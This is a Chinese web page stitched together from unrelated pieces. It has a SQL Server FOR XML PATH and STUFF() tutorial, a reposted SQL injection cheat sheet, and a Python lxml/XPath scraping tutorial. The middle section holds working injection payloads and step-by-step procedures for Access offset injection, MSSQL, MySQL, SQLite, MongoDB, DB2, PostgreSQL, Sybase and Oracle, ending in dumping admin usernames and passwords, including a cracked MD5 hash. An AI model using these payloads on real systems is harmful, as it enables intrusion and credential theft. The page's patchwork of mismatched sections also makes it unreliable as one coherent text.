整合营销服务商

电脑端+手机端+微信端=数据同步管理

免费咨询热线:

聊聊 SQL 中的For Xml Path

聊聊 SQL 中的For Xml Path

一道是关于合并同类型数据为一行的题,使用SQL Server 2017版本及以上的直接使用STRING_AGG()函数即可,但是2016版本以下是没有这个功能的,那该如何求解?

今天就给大家介绍一下FOR XML PATH,它就是用来处理低版本数据库中数据合并的,是一个比较古老的功能了,新版本中也依然还能使用。

FOR XML PATH是什么

FOR XML PATH 是将查询结果集以XML形式展现,将多行的结果,展示在同一行。

我们用实例来给大家介绍它的神奇之处。

创建测试数据

我们创建一个统计学生爱好的表

CREATE TABLE Stu_Hobby(
Stu_Name NVARCHAR(20),--姓名
Age INT,--年龄
Hobby NVARCHAR(20)  --爱好
)

INSERT INTO Stu_Hobby
VALUES  ( N'张三',19,N'踢足球'),
 ( N'张三',19,N'打篮球'),
 ( N'张三',19,N'游泳'),
 ( N'李四',21,N'看电影'),
 ( N'李四',21,N'阅读'),
 ( N'王五',22,N'唱歌'),
 ( N'王五',22,N'玩游戏'),
 ( N'马六',19,N'踢足球'),
 ( N'赵七',20,N'爬山'),
 ( N'赵七',20,N'跑步')

查询学生爱好表Stu_Hobby里面的数据:

使用方法介绍

测试数据建立好后,我们开始对这个表里面的数据进行查询,并使用上FOR XML PATH。

SELECT *FROM dbo.Stu_Hobby FOR XML PATH;

结果如下:

它会生成一段XML代码,我们点击这行代码会弹出一整个XML的页面,由于篇幅较长,我们只截取一部分,具体如下:

此外我们还可以在FOR XML PATH的后面写参数,如果后面接参数,会将节点换成参数名称,例如:

SELECT *
FROM dbo.Stu_Hobby FOR XML PATH(hobby)

结果如下图:

已经变成了我们添加的参数了。

跟我们实际需求相接近的是下面这个功能

我们可以单独输出某个字段的值,例如我们想看看学生爱好表中Hobby这一列具体有一些什么值,可以这样写:

SELECT Hobby+'、'
FROM dbo.Stu_Hobby FOR XML PATH('')

注意:上面的+是字段拼接,就是将两个字符串用+连成一个字符串。然后我们把XML中的给去掉。

结果如下:

可以看到我们写的所有爱好都给列出来了,没有去掉重复的,可以理解成把列里的值都显示出来了。

具体实际应用

我们现在想把上面的学生表里每个学生的爱好单独显示一行,爱好用"、"隔开。

SELECT
A.Stu_Name,
A.Age,
(SELECT Hobby+'、'  
FROM [dbo].Stu_Hobby
WHERE
--必须加的匹配条件
Stu_Name=A.Stu_Name AND Age=A.Age  
FOR XML PATH('')) AS Hobby
FROM [dbo].Stu_Hobby A
GROUP BY A.Stu_Name,A.Age

见证奇迹的时刻到了!!!

对比我们先前建的表,这里已经将Hobby列的数据按每个学生变成了一行。

上面的WHERE条件是必须要的,如果去掉会怎么样呢?我们把WHERE条件注释掉看看会怎么样?

SELECT
A.Stu_Name,
A.Age,
(SELECT Hobby+'、'
FROM [dbo].Stu_Hobby
--WHERE
--必须加的匹配条件
--Stu_Name=A.Stu_Name AND Age=A.Age
FOR XML PATH('')) AS Hobby
FROM [dbo].Stu_Hobby A
GROUP BY A.Stu_Name,A.Age

结果如下:

就会将Hobby列所有值都显示出来,很显然这不是我们要的结果

代码优化

不知道小伙伴们有没有发现Hobby列的结果尾部多了一个"、",看着好别扭,有没有什么办法将它去掉呢?答案是肯定的。

先用一个LEFT()和LEN()函数来处理一下Hobby列

SELECT
T.Stu_Name,
T.Age,
LEFT(T.Hobby,LEN(T.Hobby)-1) AS Hobby
FROM
(SELECT
A.Stu_Name,
A.Age,
(SELECT Hobby+'、'
FROM [dbo].Stu_Hobby
WHERE
--必须加的匹配条件
Stu_Name=A.Stu_Name AND Age=A.Age
FOR XML PATH('')) AS Hobby
FROM [dbo].Stu_Hobby A
GROUP BY A.Stu_Name,A.Age
) T

结果如下:

这样我们的需求就得到了完美解决,但是这个代码有点长额,能不能简短一点呀?答案也是肯定滴!在将代码精简之前,我们需要先给大家介绍一个配合使用的函数:

STUFF()

STUFF()函数的作用

STUFF()函数用于删除指定长度的字符,并可以在指定的起点处插入另一组字符。STUFF()函数中如果开始位置或长度值是负数,或者如果开始位置大于第一个字符串的长度,将返回空字符串。如果要删除的长度大于第一个字符串的长度,将删除到第一个字符串中的第一个字符。

STUFF()函数的语法

STUFF ( character_expression , start , length ,character_expression )

参数解释

character_expression:一个字符数据表达式。character_expression 可以是常量、变量,也可以是字符列或二进制数据列。

start :一个整数值,指定删除和插入的开始位置。如果 start 或 length 为负,则返回空字符串。如果 start 比第一个 character_expression 长,则返回空字符串。start 可以是 bigint 类型。

length:一个整数,指定要删除的字符数。如果 length 比第一个 character_expression 长,则最多删除到最后一个 character_expression 中的最后一个字符。length 可以是 bigint 类型。

返回类型

如果 character_expression 是受支持的字符数据类型,则返回字符数据。如果 character_expression 是一个受支持的 binary 数据类型,则返回二进制数据。

注意事项

1.如果开始位置或长度值是负数,或者如果开始位置大于第一个字符串的长度,将返回空字符串。如果要删除的长度大于第一个字符串的长度,将删除到第一个字符串中的第一个字符。

2.如果结果值大于返回类型支持的最大值,则产生错误。

--以上信息来源微软官方文档

这定义看的头晕,我们还是来看看怎么使用吧

实例:

SELECT STUFF('abcdefg',1,0,'1234') --结果为'1234abcdefg'
SELECT STUFF('abcdefg',1,1,'1234') --结果为'1234bcdefg'
SELECT STUFF('abcdefg',2,1,'1234') --结果为'a1234cdefg'
SELECT STUFF('abcdefg',2,2,'1234') --结果为'a1234defg'

说了这么多,我们看看STUFF怎么解决我们上面的问题吧,上代码:

SELECT
A.Stu_Name,
A.Age,
STUFF(
(SELECT '、'+Hobby
FROM [dbo].Stu_Hobby
WHERE
--必须加的匹配条件
Stu_Name=A.Stu_Name AND Age=A.Age    
FOR XML PATH('')
),1,1,'') AS Hobby
FROM [dbo].Stu_Hobby A
GROUP BY A.Stu_Name,A.Age

是不是比LEFT简短一些啦?我们看一下结果是不是我们想要的。

完美!

好了,FOR XML PATH就介绍到这里了,小伙伴可以对比以上两种优化的方法,自行比较哪种方式更加简单易懂。

SQL作用在关系型数据库上面,什么是关系型数据库?关系型数据库是由一张张的二维表组成的, 常见的关系型数据库厂商有MySQL、SQLite、SQL Server、Oracle,由于MySQL是免费的,所以企业一般用MySQL的居多。Web SQL是前端的数据库,它也是本地存储的一种,使用SQLite实现,SQLite是一种轻量级数据库,它占的空间小,支持创建表,插入、修改、删除表格数据,但是不支持修改表结构,如删掉一纵列,修改表头字段名等。但是可以把整张表删了。同一个域可以创建多个DB,每个DB有若干张表。

与数据库产生交互就有可能存在注入攻击,不只是MySQL数据库,还有Oracle,MongoDB等数据库也可能会存在注入攻击。


简要学习各种数据库的注入特点

数据库架构组成,数据库高权限操作

简要了解各数据库

Access,Mysql,mssql(Microsoft SQL server),mongoDB,postgresql,sqlite,oracle,sybase等

Access

表名

列名

数据

Access数据库保存在网站源码下面,自己网站数据库独立存在,所以无法进行跨库,也没有文件读写的操作。

除了Access其他数据库组成架构基本都是大同小异。

mysql mssql等

数据库名A

表名

列名

数据

数据库名B

。。。。。。

每个数据库功能不同,我们采取注入的时候攻入方式不同

什么决定网站注入点用户权限?

数据库配置文件的用户,是谁连接的

Access偏移注入

如果遇到列名猜解不到的情况,则可以使用Access偏移注入

  1. 原理

借用数据库的自连接查询让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示

  1. 用途

解决知道Access数据库中知道表名,但是得不到字段的sql注入困境

  1. 特点

a. 成功与否看技巧与运气,不能保证100%成功。

b. 无需管理员账号密码字段,直接爆账号密码

  1. 利用条件

a. 已知管理表名

b. 已知任意字段(一个或多个会增加机率,最常见的就是id)

  1. 影响偏移注入成功因素

a. 管理表的字段数越少越好(最好是三个:id 账号字段 密码字段)

b. 当前注入点的脚本内查询的表内的字段数越多越好

  1. 流程

a. 判断字段数

b. 判断表名

c. 开始偏移注入

本地Access偏移注入靶场

偏移量就是逐步增加或递减,直到出现结果。*表示可代替的字符串,用*代替22,返回界面依旧报错,然后用*代替21,依次递减。22-16=6,6表示该表中的列名个数。


*代表6个,后面一串字符代表两倍,就相当于2倍*,12个

爆列名数据

一级偏移语句:union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id=b.id)
二级偏移语句:union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)



二级偏移,3倍*,所以为18个


查看登录框源代码的表单值或观察URL特征等也可以针对表或列获取不到的情况

猜解表名可能是ZB_admin,观察网站地址特征,是否有前缀。

或者看登录框表单值

SQL server/MSSQL注入

  1. 介绍

Microsoft SQL Server 是一个全面的数据库平台,使用集成的商业智能 (BI)工具提供了企业级的数据管理。Microsoft SQL Server 数据库引擎为关系型数据和结构化数据提供了更安全可靠的存储功能,使您可以构建和管理用于业务的高可用和高性能的数据应用程序。

  1. 过程

判断数据库类型

and exists (select * from sysobjects)--返回正常为mssql(也名sql server)

and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈

判断数据库版本

and 1=@@version--这个语句要在有回显的模式下才可以哦

and substring((select @@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本, 返回正常就是2008的复制代码第一条语句执行效果图(类似):第二条语句执行效果图:(如果是 2008的话就返回正常)

获取所有数据库的个数 (一下3条语句可供选择使用)

1. and 1=(select quotename(count(name)) from master..sysdatabases)--

2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --

3. and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --

and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --

说明:dbid从1-4的数据库一般为系统数据库.

获取数据库 (该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)

and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--

获取当前数据库

and db_name()>0

and 1=(select db_name())--

获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于 mssql2005及以上版本)】

and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--

获得表里的列

一次爆指定表的所有列(只限于mssql2005及以上版本):

and 1=(select quotename(name) from 数据库名..syscolumns where id=(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--

and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id=(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--

⑨获取指定数据库中的表的列的数据库

逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):

and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--

一次性爆N条所有字段的数据(只限于mssql2005及以上版本):

and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图:----------------------------------加上where条件筛选结果出来会更加好,如:where and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错。

转自:http://www.myhack58.com/Article/html/3/8/2015/63146.htm

PostgraSQL注入原理

https://www.webshell.cc/524.html

https://www.cnblogs.com/yilishazi/p/14710349.html

https://www.jianshu.com/p/ba0297da2c2e

Oracle注入

https://www.cnblogs.com/peterpan0707007/p/8242119.html

MongoDB注入

https://blog.csdn.net/weixin_33881753/article/details/87981552

https://www.secpulse.com/archives/3278.html

各数据库手工注入

MySQL:

1.找到注入点 and 1=1 and 1=2 测试报错

2.order by 5 # 到5的时候报错,获取字段总数为4

3.id=0(不是1就行,强行报错) union select 1,2,3,4 # 联合查询,2和3可以显示信息

4.获取数据库信息

user()==>root

database()==>mozhe_Discuz_StormGroup

version()==>5.7.22-0ubuntu0.16.04.1

5.获取数据库表

table_name 表名

information_schema.tables 系统生成信息表

table_schema=数据库名16进制或者用单引号括起来

改变limit 0,1中前一个参数,得到两个表 StormGroup_member notice

6.获取列名

结果如下 id,name,password,status

7.脱裤


Access:

1.and 1=2 报错找到注入点

2.order by 获取总字段

3.猜解表名 and exists (select * from admin) 页面返回正常,说明存在admin表

4.猜解列名 and exists(select id from admin) 页面显示正常,admin表中存在id列 username,passwd 同样存在

5.脱裤 union select 1,username,passwd,4 from admin

MSSQL:

1.and 1=2报错

2.order by N# 获取总字段

3.猜表名 and exists(select * from manage) 表名manage存在

4.猜解列名 and exists(select id from manage) 列名id存在,同样username,password也存在

5.脱裤 and exists (select id from manage where id=1 ) 证明id=1存在

and exists (select id from manage where%20 len(username)=8 and id=1 ) 猜解username字段长度为8

and exists (select id from manage where%20 len(password)=16 and id=1 ) 猜解password字段长度为16

可用Burp的Intruder功能辅助猜解

猜解username第1到8位的字符,ASCII转码 admin_mz

猜解password第1到16位的字符,ASCII转码(Burp 爆破)

转ASCII的py脚本:

72e1bfc3f01b7583 MD5解密为97285101


SQLite:

1.找注入点 and 1=1

2.order by N 猜字段 4

3.猜数据库

offset==>0~2

有三个数据库:

WSTMart_reg

notice_sybase

sqlite_sequence

4.猜列

共有3个字段:

id,name,password

5.脱裤


MongoDB:

1.id=1′ 单引号注入报错

2.闭合语句,查看所有集合

3.查看指定集合的数据

[0] 代表第一条数据,可递增


DB2:

1.and 1=2 判断注入点

2.order by N 获取字段数

3.爆当前数据库

GAME_CHARACTER

4.列表

NAME

5.脱裤


PostgreSQL:

1.and 1=2 判断注入点

2.order by N 获取字段

3.爆数据库

4.列表

5.列字段

6.拖库


Sybase数据库:

1.and 1=2 判断注入点

2.order by N 获取总字段

3.爆数据库

4.列表

5.列字段

6.查状态

结果为:zhang

7.反选爆用户名

结果为:mozhe

8.猜解密码


Oracle:

1.and 1=1

2.order by

3.爆数据库

4.列表

5.列字段

6.拖库

加上状态:1 where STATUS=1

、安装

XPath (XML Path Language) 是一门在 HTML\XML 文档中查找信息的语言,可用来在 HTML\XML 文档中对元素和属性进行遍历。

pip install lxml

二、使用案例

from lxml import etree
import requests
import asyncio
import functools
import re
import json

house_info=[]

'''异步请求获取链家每页数据'''
async def get_page(page_index):
    headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'
    }
    request=functools.partial(requests.get, f'https://sh.lianjia.com/ershoufang/pudong/pg{page_index}/',
                                headers=headers)
    loop=asyncio.get_running_loop()
    response=await loop.run_in_executor(None, request)
    return response

'''使用xpath获取房屋信息'''
def get_house_info(html):
    title_list=html.xpath('//a[@data-el="ershoufang"]/text()')  # 房屋title
    house_pattern_list=html.xpath('//div[@class="houseInfo"]/text()')  # 房屋格局
    price_list=html.xpath('//div[@class="unitPrice"]/span/text()')  # 房屋单价
    location_list=html.xpath('//div[@class="positionInfo"]')  # 房屋位置信息
    total_list=html.xpath('//div[contains(@class,"totalPrice")]')  # 总价

    for index, item in enumerate(zip(title_list, house_pattern_list, price_list)):
        location_item=location_list[index]
        total_item=total_list[index]
        house_info.append({
            'title': item[0],
            'house_pattern': item[1],
            'price': item[2],
            'location': location_item.xpath('./a[1]/text()')[0] + location_item.xpath('./a[last()]/text()')[0],
            'total': total_item.xpath('./span/text()')[0] + total_item.xpath('./i[last()]/text()')[0]
        })

'''异步获取第一页数据,拿到第一页房屋信息,并返回分页总数和当前页'''
async def get_first_page():
    response=await get_page(1)
    #etree.HTML 将获取到的html字符串转为可操作的Element对象
    get_house_info(etree.HTML(response.text))

if __name__=='__main__':
    asyncio.run(get_first_page())

三、etree 模块

  1. etree.Element(element_name, attrib=None, nsmap=None) 创建element对象
from lxml import etree
'''
element_name:要创建的元素的名称
attrib:元素的属性字典
nsmap:命名空间映射字典,用于指定元素的命名空间
'''
element=etree.Element('div',attrib={'class':'test'},nsmap={"ns": "http://example.com/ns"})
  1. etree.SubElement(parent, element_name, attrib=None, nsmap=None) 创建子元素
from lxml import etree
'''
parent:element对象
element_name:要创建的元素的名称
attrib:元素的属性字典
nsmap:命名空间映射字典,用于指定元素的命名空间
'''
element=etree.Element('div', attrib={'class': 'test'}, nsmap={"ns": "http://example.com/ns"})
span_element=etree.SubElement(element,'span')
span_element.text='我是span'
print(element.xpath('//div/span/text()'))
  1. etree.fromstring(text, parser=None,base_url=None) 将XML、HTML字符串解析为Element对象
from lxml import etree

'''
text:解析的XML字符串
parse:解析器对象,默认lxml.etree.XMLParser、lxml.etree.HTMLParser
base_url: 基本URL,用于解析相对URL。如果HTML文档中包含相对URL,解析器将使用base_url来将其转换为绝对URL。如果未提供base_url,则相对URL将保持不变
'''
html_str='<div class="test"><span>我是span</span></div>'
element=etree.fromstring(html_str)
print(element.xpath('//div/span/text()'))
  1. etree.HTML(text, parser=None, base_url=None) 将HTML字符串解析为Element对象
from lxml import etree

'''
xml_string:解析的XML字符串
parse:解析器对象,默认lxml.etree.HTMLParser
base_url: 基本URL,用于解析相对URL。如果HTML文档中包含相对URL,解析器将使用base_url来将其转换为绝对URL。如果未提供base_url,则相对URL将保持不变
'''
html_str='<div class="test"><span>我是span</span></div>'
element=etree.HTML(html_str)
print(element.xpath('//div/span/text()'))
  1. etree.XML(text, parser=None, base_url=None) 将XML字符串解析为Element对象
from lxml import etree

'''
text:解析的XML字符串
parse:解析器对象,默认lxml.etree.XMLParser
base_url: 基本URL,用于解析相对URL。如果HTML文档中包含相对URL,解析器将使用base_url来将其转换为绝对URL。如果未提供base_url,则相对URL将保持不变
'''
html_str='<div class="test"><span>我是span</span></div>'
element=etree.XML(html_str)
print(element.xpath('//div/span/text()'))
  1. etree.parse(source, parser=None, base_url=None) 将XML、HTML字符串解析为ElementTree对象

四、element 对象

  1. element.xpath(path) 执行xpath语法
  2. element.nsmap:获取或设置元素命名空间映射
  3. element.attrib:获取或设置元素属性
  4. element.text:获取或设置文本
  5. element.tag:返回对象名称
  6. element.append(element) 向节点里面追加子节点
  7. element.insert(index,element) 向节点开始的某个位置添加子节点
from lxml import etree

element=etree.Element('div', attrib={'class': 'test'})
span_element=etree.SubElement(element, 'span')
span_element.text='我是span'append_child=etree.Element('div', attrib={'class': 'append'})
append_child.text='我是append_child'insert_child=etree.Element('div', attrib={'class': 'insert'})
insert_child.text='我是insert_child'element.append(append_child)
element.insert(0,insert_child)
print(element.xpath('//div/span/text()'))
print(element.xpath('//div/div[@class="append"]/text()'))
print(element.xpath('//div/div[@class="insert"]/text()'))
  1. element.find(xpath): 在元素的子树中查找与XPath表达式匹配的第一个元素,并返回该元素。如果找不到匹配的元素,则返回None
  2. element.findall(xpath): 在元素的子树中查找与XPath表达式匹配的所有元素,并返回一个列表
  3. element.get(attribute_name, default=None): 获取元素的指定属性的值
  4. element.set(attribute_name, value): 设置元素的指定属性的值
  5. element.iter(tag=None): 迭代元素及其子元素,可选择指定标签进行过滤
  6. element.getparent(): 获取元素的父元素
  7. element.getchildren(): 获取元素的所有子元素
  8. element.getroottree(): 获取包含元素的根元素的Tree对象

五、elementTree 对象

  1. elementTree.root: 根元素的Element对象。可以通过访问tree.root来获取根元素。
  2. elementTree.getroot(): 获取根元素的Element对象。与tree.root属性相同,用于获取根元素
  3. elementTree.find(path): 在整个文档中查找具有指定路径的第一个元素,并返回该元素的Element对象。路径可以使用XPath表达式指定
  4. elementTree.findall(path): 在整个文档中查找具有指定路径的所有元素,并返回这些元素的列表。路径可以使用XPath表达式指定
  5. elementTree.iterfind(path): 在整个文档中迭代查找具有指定路径的元素,并返回这些元素的迭代器。路径可以使用XPath表达式指定
  6. elementTree.write(file, encoding=None, xml_declaration=None, pretty_print=False): 将整个文档写入文件。file参数可以是文件名或文件对象。encoding参数指定写入文件时使用的字符编码。xml_declaration参数指定是否写入XML声明。pretty_print参数指定是否以更易读的格式写入文档
  7. elementTree.tostring(element, encoding=None, method="xml", pretty_print=False): 将指定元素及其子元素序列化为字符串。element参数是要序列化的元素。encoding参数指定字符串的字符编码。method参数指定序列化的方法,可以是"xml"(默认)或"html"。pretty_print参数指定是否以更易读的格式序列化。
  8. elementTree.parse(source, parser=None, base_url=None): 静态方法,用于解析XML或HTML文档并返回一个ElementTree对象。与etree.parse函数的用法相同

六、parse 解析器对象

  1. lxml.etree.XMLParser: 用于解析XML文档的默认解析器。它支持标准的XML解析,并提供了丰富的功能和选项,如命名空间支持、DTD验证等。
  2. lxml.etree.HTMLParser: 用于解析HTML文档的默认解析器。它专门针对HTML进行了优化,并具有处理HTML特性的功能,如自动修复破碎的标签、处理实体引用等。
  3. lxml.etree.XMLPullParser: 一种事件驱动的解析器,用于逐行解析XML文档。它提供了一个迭代器接口,可以逐行读取和处理XML文档。
  4. lxml.etree.HTMLPullParser: 一种事件驱动的解析器,用于逐行解析HTML文档。它提供了一个迭代器接口,可以逐行读取和处理HTML文档。